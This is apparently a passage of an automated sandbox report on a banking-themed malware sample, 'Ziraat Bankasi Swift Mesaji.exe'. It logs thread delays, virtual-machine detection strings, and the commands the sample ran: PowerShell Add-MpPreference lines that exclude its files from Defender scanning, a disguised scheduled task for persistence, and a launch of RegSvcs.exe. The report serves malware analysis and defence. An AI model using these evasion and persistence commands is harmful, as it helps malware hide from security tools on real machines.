            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599078Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598969Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598844Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598735Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598610Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598485Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598360Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598235Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598110Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597893Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597760Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597653Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597530Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597422Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597297Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597188Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597063Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596953Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596844Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596719Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596610Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596485Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596360Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596222Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596094Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595985Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595735Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595610Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595485Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595360Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595231Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594926Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594791Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594687Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594571Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594469Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594359Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594250Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594140Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594030Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593921Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593813Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593688Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5952Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 478Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6622Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 699Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 5306Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 4517Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1772Thread sleep count: 5952 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3176Thread sleep count: 478 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6508Thread sleep time: -4611686018427385s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4564Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6480Thread sleep time: -6456360425798339s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 984Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599889Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599779Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599666Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599443Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599313Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599188Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599078Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598969Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598844Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598735Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598610Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598485Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598360Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598235Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598110Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597893Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597760Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597653Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597530Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597422Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597297Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597188Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597063Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596953Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596844Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596719Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596610Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596485Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596360Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596222Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596094Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595985Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595735Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595610Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595485Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595360Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595231Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594926Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594791Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594687Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594571Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594469Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594359Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594250Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594140Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594030Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593921Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593813Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593688Jump to behavior
            Source: Amcache.hve.11.drBinary or memory string: VMware
            Source: Amcache.hve.11.drBinary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.11.drBinary or memory string: vmci.syshbin
            Source: Amcache.hve.11.drBinary or memory string: VMware, Inc.
            Source: Amcache.hve.11.drBinary or memory string: VMware20,1hbin@
            Source: Amcache.hve.11.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.11.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.11.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.11.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.11.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: Amcache.hve.11.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.11.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: RegSvcs.exe, 00000008.00000002.4519627685.0000000001306000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc
            Source: Amcache.hve.11.drBinary or memory string: vmci.sys
            Source: Amcache.hve.11.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
            Source: Amcache.hve.11.drBinary or memory string: vmci.syshbin`
            Source: Amcache.hve.11.drBinary or memory string: \driver\vmci,\driver\pci
            Source: Amcache.hve.11.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.11.drBinary or memory string: VMware20,1
            Source: Amcache.hve.11.drBinary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.11.drBinary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.11.drBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.11.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Amcache.hve.11.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.11.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.11.drBinary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.11.drBinary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.11.drBinary or memory string: VMware Virtual RAM
            Source: Amcache.hve.11.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: Amcache.hve.11.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe"
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe"
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZnbATfUbUgZW" /XML "C:\Users\user\AppData\Local\Temp\tmpE679.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeQueries volume information: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
